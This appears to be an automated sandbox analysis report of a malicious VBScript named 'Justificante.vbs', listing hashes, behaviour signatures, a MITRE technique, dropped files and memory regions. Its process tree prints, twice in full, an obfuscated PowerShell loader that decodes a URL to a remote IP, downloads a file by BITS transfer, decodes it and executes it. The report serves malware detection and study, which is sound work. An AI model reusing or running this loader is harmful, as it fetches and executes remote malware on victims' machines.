600dc96e1ab08056cacac0a94158b609a565bbd1a682be71eea704405949c80f

General

Target

Justificante.vbs
Size

23KB
MD5

c17a702d13da16d40d60d624866e5662
SHA1

21222a8d1c645ecccc07090558a93cc28844fd80
SHA256

3366e7cf0549781bef6c2690dd392ad34cfd7c3355e99f3d042256d6df2b4281
SHA512

ff41f3c65eff02bf8c9c97b3701422f9f48a76c5b3239d905db3a2b6799b9ba95dea2fda4be37403323418e18123370b57ceeddb92adcb474cd06bc508fa2fc9
SSDEEP

384:tDH9kcbBojN2IDLDpNXI+icmCPYoM5IZJuX7PvZDKZFdjiHf1Q4nBT:tDOcbBQ2IDLscmCPYoMX7PRKo3

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
3	2952	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
844	powershell.exe
2500	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	844	powershell.exe
Token: SeDebugPrivilege	2500	powershell.exe

Suspicious use of WriteProcessMemory 10 IoCs

description	pid	Process	procid_target
PID 2952 wrote to memory of 1648	2952	WScript.exe	28
PID 2952 wrote to memory of 1648	2952	WScript.exe	28
PID 2952 wrote to memory of 1648	2952	WScript.exe	28
PID 2952 wrote to memory of 844	2952	WScript.exe	30
PID 2952 wrote to memory of 844	2952	WScript.exe	30
PID 2952 wrote to memory of 844	2952	WScript.exe	30
PID 844 wrote to memory of 2500	844	powershell.exe	33
PID 844 wrote to memory of 2500	844	powershell.exe	33
PID 844 wrote to memory of 2500	844	powershell.exe	33
PID 844 wrote to memory of 2500	844	powershell.exe	33

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Justificante.vbs"
1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2952
- C:\Windows\System32\cmd.exe
  cmd.exe /c echo 80
  2⤵
  PID:1648
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Republikan9 ([String]$Subsurfa){$Ensp=$Subsurfa.toCharArray();For($Untech=5; $Untech -lt $Ensp.count-1; $Untech+=(5+1)){$Servic+=$Ensp[$Untech]};$Servic;}$Langfriste=Republikan9 'PersohAnafotKondetReptip Krom:Kearn/Spilt/Extor9Udlse4Synte.Udlov1Algot5Forpe6Wando.Inclu6Super.Hypom1Rense5Afreg8Linke/Encycb Secuugruppr SupeeUdlsnaAndriu frdikSacrarCylina Paynt Opfa.dehydqChefdxTransdInkvi ';$Servic01=Republikan9 'StudiiAlbumeStrmpxEpigr ';$Abonnr = Republikan9 'Unsat\forhasEbeltyDataasDossewUneduoOsmoswStrkk6 Perl4Space\ OutwWAntiliWeltenEmbardBeholo NoejwOverssFustlPUdskioRodinwGianteCurrirMudirSStaddh HetaeReascl BrillForud\ZydecvAnefa1Embed.Efter0Salvn\SjapipLigkioAlveow HatceFaldsr HemosBrushhFoeise AfvilTheokl Creo. SermeFlatfxPhytoeCarva ';.($Servic01) (Republikan9 'Bulbu$XyzlylBredsiweathc FalskHazineSkvadnMetap2Babep=Nomin$BaluseergotnSimiavMusli:HarnswtitteiSortenFrakod ErnriSynger Sysk ') ;.($Servic01) (Republikan9 'Konsu$SolskAFloydbBlodpoHalfhnshowenToejdrUndan= Slng$TheellSkyggiReagec kernk MadoeReclanAntip2Enlar+Rerin$EmissAIndfjbWordioVapoun BandnQuinqrNakke ') ;.($Servic01) (Republikan9 'Udbom$BrakksFormatCosmouFritidItoni Purpl=Freck Disti(Prvef(Underg Girdw AttamBuxeriUbefa Angrew SubviMandsn Papi3Unsym2 Hamp_StorkpRewarr slskoGarstc ProaekloaksIcerssTrici Tapet-AressFResel SerorPPasterPremaoMaksicOverde ReclsJanuascompuISammedTrior=Yderp$Lethe{SmokiPPostnIBalugD Indg}Faden)Udski.SigneCStberoTreasmMunkemCutchaEssonnGlasudBestyL Undvi MaarnEndoceblend)Radia Ibere-BastisReborpIpecalIndreiEmbrat Detr Embed[ForrecDisadhSkoleaDobber Filc]Polys3Later4Tilsj ');.($Servic01) (Republikan9 'Krige$KnappR AfkoeSejers MedihFloptaMolec Ruder=Forur Alien$BakkesBruget PhytuPediadSatis[Murer$BengtsBogfrt SawfuMecomdConta.CaritcSkotvoAmeliuPeggynBrothtTegne-Super2Krene]haglb ');.($Servic01) (Republikan9 'Vocal$SmuttBFastei UindoNontrc karb=Gartn(BagakTKvalieHockesHowketMazed-KosakP SlosaIndlet Mufthsnake Guldb$EducaAdilapbAnguioFormbnAdrianRollermanga)Putti Natur-RemarAToldbnBackpdImpon koll(Borge[ScreaIFtrewnInbust RovsPGangltOpprirStors] unen:Doner:FilmssUlvsriWorthzStaireOmstt Tiltu-ParkeeLimsyqForre Fasc8Stemm)Carom ') ;if ($Bioc) {.$Abonnr $Resha;} else {;$Servic00=Republikan9 ' FronSSkatttamyloaNainsr Burkt Grde-TakkeBflorsiLatintFormis KatzTMankorVagabaCroslnLettisIndicfPatteeFlgelrSatse Still-FremmSdybfroRachmuSubscrPolygc KoageWakon Misap$SkoggLConsia AngonNonveg FordfAsocir Afski DevisNannit OvereFontn Fatti-sunniDVendee RadusXenyltCognai ShienDagblaStilltSkaldiClamooPelikn Tvtt porse$HobbllPaabeiForencudmalkMetaleInoscn Dung2Colli ';.($Servic01) (Republikan9 'offen$PlagelJagtkiAerotcMonumkVerife ThernKvikk2Bened=Skovs$brande EscanDokumv Magu:ornitaDeverpSilvep UnprdFjeldaSwatttspalta Lept ') ;.($Servic01) (Republikan9 'SneppI RepimRajplpPertuo FilmrJudgmtNontr-mdrenM FluooDraged slavuMensulPhotoeNomol DukkeBMeniniSambhtBadass SubkTAsyndrKonvoaBenzin MrkvsVithuf Raake DoterTupil ') ;$licken2=$licken2+'\abiogeni.hng';while (-not $Rainerswhi) {.($Servic01) (Republikan9 'Siegf$FormaRScoreaSussuiRattlninduceCarthrOverosSadlewAfhughStensiJobeo=Nettl(TriphTNarkoeAgilisSkjultOverh- OverP trouaornamtSkvhohOctap Scupp$HypozlGammaiEngagcEquickNoteaeHoghonPropo2begri)Untra ') ;.($Servic01) $Servic00;.($Servic01) (Republikan9 ' prolSutilbtDreckaFarverFravitVidar-BremsSTappelJockeeBlokaeDemivpXanth Gttel5Formu ');}.($Servic01) (Republikan9 'Rappo$UdbytRautopeBlotcpGglsru PicobOverflMojotinectakGulliaTilstnSubku Volle=Chron AbstrGPrsideDiment Prod-fremvCBirdloHovedn ParatXenogeFaamanOutskt Menn cymo$ BalllWrathi SkrucUddankNonsee ClasnPerus2 Dyre ');.($Servic01) (Republikan9 'brdsk$DrejeS Uncou Phosb SphaaBicorlNonsptpinuseUdfalrNonco Teen=magtf Gazet[SaltlSForsoyHelmis Akkotunpuneoverwm Afsi.KlukkC ForgoKilobnOpkbevEnergeGerbirChrystManic]indfr: schc:HvlefFAdjunr MiksoBestrm FortBSkattaOpvaasOpgaveNewsy6Sudan4SigneSFjumstEkskurIroniiMogignHeathgcarbu( Affu$ NoteRDiscoeplenupvittuu Dirib ereplExcogiModulkTarieaDeludnForso) Grie ');.($Servic01) (Republikan9 'Indva$EmbosSForgreBedesrSuperv CirriTradecStrib2Pepsi Fodtu=Klaps Exan[ CameSDesbuyJohnisTurbatSodioeTheramMorse.orakeTDratve BevixsponstTroak.IndivEPussenPapircKongeoStartdKilogiGaonpnbenoigMedta]Inert: Guld:BrancA CoroS TickC thelI pempInonel.HelioGSprgseparaetCagesS SonotTensirDebati FeebnRunolg efte(Perso$FluemSRustnu unfobFarmha RentlVejent MedlePatrirAfren)Murri ');.($Servic01) (Republikan9 'Reval$TechiDKommurForeho Meloe AspamrecommKaffee Kult=Shape$DividSValgdeGaloprMillivBesini HookcPatho2Grabe.Frists PolluAfvenbDrivesBredbtRocker Equii BoksnServigTeleg( Afhs2 Oweb6 Foun7Overp6Denud2 Arbe3Maler, Grib2Sdeli5Succe0Giddy5Flssc4Mahog)Rumsk ');.($Servic01) $Droemme;}"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:844
- - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Republikan9 ([String]$Subsurfa){$Ensp=$Subsurfa.toCharArray();For($Untech=5; $Untech -lt $Ensp.count-1; $Untech+=(5+1)){$Servic+=$Ensp[$Untech]};$Servic;}$Langfriste=Republikan9 'PersohAnafotKondetReptip Krom:Kearn/Spilt/Extor9Udlse4Synte.Udlov1Algot5Forpe6Wando.Inclu6Super.Hypom1Rense5Afreg8Linke/Encycb Secuugruppr SupeeUdlsnaAndriu frdikSacrarCylina Paynt Opfa.dehydqChefdxTransdInkvi ';$Servic01=Republikan9 'StudiiAlbumeStrmpxEpigr ';$Abonnr = Republikan9 'Unsat\forhasEbeltyDataasDossewUneduoOsmoswStrkk6 Perl4Space\ OutwWAntiliWeltenEmbardBeholo NoejwOverssFustlPUdskioRodinwGianteCurrirMudirSStaddh HetaeReascl BrillForud\ZydecvAnefa1Embed.Efter0Salvn\SjapipLigkioAlveow HatceFaldsr HemosBrushhFoeise AfvilTheokl Creo. SermeFlatfxPhytoeCarva ';.($Servic01) (Republikan9 'Bulbu$XyzlylBredsiweathc FalskHazineSkvadnMetap2Babep=Nomin$BaluseergotnSimiavMusli:HarnswtitteiSortenFrakod ErnriSynger Sysk ') ;.($Servic01) (Republikan9 'Konsu$SolskAFloydbBlodpoHalfhnshowenToejdrUndan= Slng$TheellSkyggiReagec kernk MadoeReclanAntip2Enlar+Rerin$EmissAIndfjbWordioVapoun BandnQuinqrNakke ') ;.($Servic01) (Republikan9 'Udbom$BrakksFormatCosmouFritidItoni Purpl=Freck Disti(Prvef(Underg Girdw AttamBuxeriUbefa Angrew SubviMandsn Papi3Unsym2 Hamp_StorkpRewarr slskoGarstc ProaekloaksIcerssTrici Tapet-AressFResel SerorPPasterPremaoMaksicOverde ReclsJanuascompuISammedTrior=Yderp$Lethe{SmokiPPostnIBalugD Indg}Faden)Udski.SigneCStberoTreasmMunkemCutchaEssonnGlasudBestyL Undvi MaarnEndoceblend)Radia Ibere-BastisReborpIpecalIndreiEmbrat Detr Embed[ForrecDisadhSkoleaDobber Filc]Polys3Later4Tilsj ');.($Servic01) (Republikan9 'Krige$KnappR AfkoeSejers MedihFloptaMolec Ruder=Forur Alien$BakkesBruget PhytuPediadSatis[Murer$BengtsBogfrt SawfuMecomdConta.CaritcSkotvoAmeliuPeggynBrothtTegne-Super2Krene]haglb ');.($Servic01) (Republikan9 'Vocal$SmuttBFastei UindoNontrc karb=Gartn(BagakTKvalieHockesHowketMazed-KosakP SlosaIndlet Mufthsnake Guldb$EducaAdilapbAnguioFormbnAdrianRollermanga)Putti Natur-RemarAToldbnBackpdImpon koll(Borge[ScreaIFtrewnInbust RovsPGangltOpprirStors] unen:Doner:FilmssUlvsriWorthzStaireOmstt Tiltu-ParkeeLimsyqForre Fasc8Stemm)Carom ') ;if ($Bioc) {.$Abonnr $Resha;} else {;$Servic00=Republikan9 ' FronSSkatttamyloaNainsr Burkt Grde-TakkeBflorsiLatintFormis KatzTMankorVagabaCroslnLettisIndicfPatteeFlgelrSatse Still-FremmSdybfroRachmuSubscrPolygc KoageWakon Misap$SkoggLConsia AngonNonveg FordfAsocir Afski DevisNannit OvereFontn Fatti-sunniDVendee RadusXenyltCognai ShienDagblaStilltSkaldiClamooPelikn Tvtt porse$HobbllPaabeiForencudmalkMetaleInoscn Dung2Colli ';.($Servic01) (Republikan9 'offen$PlagelJagtkiAerotcMonumkVerife ThernKvikk2Bened=Skovs$brande EscanDokumv Magu:ornitaDeverpSilvep UnprdFjeldaSwatttspalta Lept ') ;.($Servic01) (Republikan9 'SneppI RepimRajplpPertuo FilmrJudgmtNontr-mdrenM FluooDraged slavuMensulPhotoeNomol DukkeBMeniniSambhtBadass SubkTAsyndrKonvoaBenzin MrkvsVithuf Raake DoterTupil ') ;$licken2=$licken2+'\abiogeni.hng';while (-not $Rainerswhi) {.($Servic01) (Republikan9 'Siegf$FormaRScoreaSussuiRattlninduceCarthrOverosSadlewAfhughStensiJobeo=Nettl(TriphTNarkoeAgilisSkjultOverh- OverP trouaornamtSkvhohOctap Scupp$HypozlGammaiEngagcEquickNoteaeHoghonPropo2begri)Untra ') ;.($Servic01) $Servic00;.($Servic01) (Republikan9 ' prolSutilbtDreckaFarverFravitVidar-BremsSTappelJockeeBlokaeDemivpXanth Gttel5Formu ');}.($Servic01) (Republikan9 'Rappo$UdbytRautopeBlotcpGglsru PicobOverflMojotinectakGulliaTilstnSubku Volle=Chron AbstrGPrsideDiment Prod-fremvCBirdloHovedn ParatXenogeFaamanOutskt Menn cymo$ BalllWrathi SkrucUddankNonsee ClasnPerus2 Dyre ');.($Servic01) (Republikan9 'brdsk$DrejeS Uncou Phosb SphaaBicorlNonsptpinuseUdfalrNonco Teen=magtf Gazet[SaltlSForsoyHelmis Akkotunpuneoverwm Afsi.KlukkC ForgoKilobnOpkbevEnergeGerbirChrystManic]indfr: schc:HvlefFAdjunr MiksoBestrm FortBSkattaOpvaasOpgaveNewsy6Sudan4SigneSFjumstEkskurIroniiMogignHeathgcarbu( Affu$ NoteRDiscoeplenupvittuu Dirib ereplExcogiModulkTarieaDeludnForso) Grie ');.($Servic01) (Republikan9 'Indva$EmbosSForgreBedesrSuperv CirriTradecStrib2Pepsi Fodtu=Klaps Exan[ CameSDesbuyJohnisTurbatSodioeTheramMorse.orakeTDratve BevixsponstTroak.IndivEPussenPapircKongeoStartdKilogiGaonpnbenoigMedta]Inert: Guld:BrancA CoroS TickC thelI pempInonel.HelioGSprgseparaetCagesS SonotTensirDebati FeebnRunolg efte(Perso$FluemSRustnu unfobFarmha RentlVejent MedlePatrirAfren)Murri ');.($Servic01) (Republikan9 'Reval$TechiDKommurForeho Meloe AspamrecommKaffee Kult=Shape$DividSValgdeGaloprMillivBesini HookcPatho2Grabe.Frists PolluAfvenbDrivesBredbtRocker Equii BoksnServigTeleg( Afhs2 Oweb6 Foun7Overp6Denud2 Arbe3Maler, Grib2Sdeli5Succe0Giddy5Flssc4Mahog)Rumsk ');.($Servic01) $Droemme;}"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2500

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
51da7c9126bbef36d6115a6eabba7d22

SHA1
0356a6e17700f9c720a81156871d12e7873981fd

SHA256
8713eda6cb46a15ebc9f352e19264cf39047bc49aa4b166804c199f1bd2400fc

SHA512
8e764c307d861432eb4be1f17951cdeb5f78b7f96c9e58b488de7228a3f74e87efc09ac90451cb9198eec5c600cec73d5610f8fbc719c32ae155916f9ab5b4c1

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab7F21.tmp

Filesize
61KB

MD5
f3441b8572aae8801c04f3060b550443

SHA1
4ef0a35436125d6821831ef36c28ffaf196cda15

SHA256
6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf

SHA512
5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar98F6.tmp

Filesize
163KB

MD5
9441737383d21192400eca82fda910ec

SHA1
725e0d606a4fc9ba44aa8ffde65bed15e65367e4

SHA256
bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5

SHA512
7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5T2HHQ3X8C33127UBHZV.temp

Filesize
7KB

MD5
ecc264f869c281429a70989ed9614e0c

SHA1
a7e22dbcece0775756eb8c3ef0e57293286b4fe4

SHA256
0bdd23fa40ff57e166165ae9fdb1c628caf08295cb0826e6cdc76f9d9b0153de

SHA512
23b8bdd5b4bc1e2942dfd8459e8b6236ed2fea40eefbbdaf2ccab55aecb1277eb8e1747af575de237e570c4021e7afc5823c4da5b7275b7810aa504bdc957091

Download Submit
memory/844-43-0x000007FEF59F0000-0x000007FEF638D000-memory.dmp

Filesize
9.6MB

Download
memory/844-45-0x0000000002530000-0x00000000025B0000-memory.dmp

Filesize
512KB

Download
memory/844-23-0x0000000002530000-0x00000000025B0000-memory.dmp

Filesize
512KB

Download
memory/844-26-0x000007FEF59F0000-0x000007FEF638D000-memory.dmp

Filesize
9.6MB

Download
memory/844-24-0x0000000002530000-0x00000000025B0000-memory.dmp

Filesize
512KB

Download
memory/844-47-0x0000000002530000-0x00000000025B0000-memory.dmp

Filesize
512KB

Download
memory/844-46-0x0000000002530000-0x00000000025B0000-memory.dmp

Filesize
512KB

Download
memory/844-25-0x0000000002530000-0x00000000025B0000-memory.dmp

Filesize
512KB

Download
memory/844-44-0x0000000002530000-0x00000000025B0000-memory.dmp

Filesize
512KB

Download
memory/844-22-0x000007FEF59F0000-0x000007FEF638D000-memory.dmp

Filesize
9.6MB

Download
memory/844-21-0x0000000002040000-0x0000000002048000-memory.dmp

Filesize
32KB

Download
memory/844-20-0x000000001B1B0000-0x000000001B492000-memory.dmp

Filesize
2.9MB

Download
memory/2500-32-0x00000000027F0000-0x0000000002830000-memory.dmp

Filesize
256KB

Download
memory/2500-31-0x00000000027F0000-0x0000000002830000-memory.dmp

Filesize
256KB

Download
memory/2500-30-0x0000000073690000-0x0000000073C3B000-memory.dmp

Filesize
5.7MB

Download
memory/2500-29-0x0000000073690000-0x0000000073C3B000-memory.dmp

Filesize
5.7MB

Download
memory/2500-48-0x0000000073690000-0x0000000073C3B000-memory.dmp

Filesize
5.7MB

Download
memory/2500-49-0x00000000027F0000-0x0000000002830000-memory.dmp

Filesize
256KB

Download

Analysis

Sharing